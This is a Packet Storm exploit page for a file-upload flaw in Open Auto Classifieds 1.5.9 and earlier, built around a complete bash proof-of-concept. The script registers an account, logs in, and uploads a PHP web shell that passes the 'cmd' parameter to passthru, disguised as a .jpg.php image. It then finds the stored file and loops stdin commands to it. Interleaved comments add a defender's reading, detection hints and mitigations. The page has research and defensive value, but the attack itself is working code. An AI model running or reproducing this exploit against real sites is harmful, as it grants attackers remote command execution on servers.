Open Auto Classifieds 1.5.9 File Upload

2009-08-26T00:00:00
ID PACKETSTORM:80697
Type packetstorm
Reporter Andrew Horton (urbanadventurer)
Modified 2009-08-26T00:00:00

Description

                                        
                                            `#!/bin/bash  
# File Upload exploit for Open Auto Classifieds version <= 1.5.9  
#   
# Researched by Andrew Horton (urbanadventurer)  
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/  
  
# Overview (defender's reading of this PoC): the script registers an ordinary
# account, logs in, uploads a PHP file through the profile-image form, and then
# requests that file from the public image directory, where it runs as PHP.
# Each stage is an HTTP request to a fixed path, so each leaves a separate
# entry in the web server's access log.

# Usage guard: with no target URL, print help and stop.
if [ -z "$1" ]; then  
echo "Usage: $0 <target-url>"  
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"  
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."  
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"  
exit  
fi  
target="$1"  
  
# The uploaded file is a one-line PHP script that hands the request's 'cmd'
# parameter to passthru(). Its name ends in ".jpg.php", so the final extension
# is .php.
# NOTE(review): the server-side upload check is not shown on this page;
# presumably it accepts the name because ".jpg" appears in it. Confirm against
# the application's upload handler.
# Mitigation: allow-list the *final* extension, generate the stored filename
# server-side, and disable script execution in the upload directory.
echo "<? print passthru(\$_REQUEST['cmd']); ?>" > evilimage.jpg.php   
  
# Self-registration needs no prior access: this request sends no existing
# session cookie (only -c, to save whatever the server sets).
# Detection: POST to register.php followed shortly by login.php and
# useredit.php from the same client; the account name here is the fixed
# string 'hacker'.
echo "Registering user"  
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1  
# Log in with the new credentials; the session cookie is kept in ./cookiejar.
echo "Login"  
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1  
# Multipart POST to useredit.php with form field 'image'. The only privilege
# used is that of a freshly self-registered member.
# Detection: uploads to useredit.php whose filename has .php as its last
# extension.
echo "Upload command shell as user image"  
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1  
  
# The stored filename is "hacker" + a 4-digit value + the original upload name
# (see the URL built below). The script recovers the 4 digits by scraping
# member.php for the line that references the thumbnail (_thumb.jpg). This
# shows the application keeps the client-supplied name and extension.
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"`  
# Only the local working files are deleted; the uploaded file stays on the
# server. Incident response: search images/users/ for files ending in .php.
rm -f cookiejar evilimage.jpg.php  
echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id"  
  
# A first GET with cmd=id checks that the uploaded file executes. The loop then
# sends each line read from stdin as a POST 'cmd' parameter to the same URL.
# Detection: any request for a .php path under images/users/. POST bodies are
# usually not recorded in default access logs, so the commands themselves may
# not be recoverable from those logs alone.
curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null  
while read cmd; do  
curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null  
done  
  
`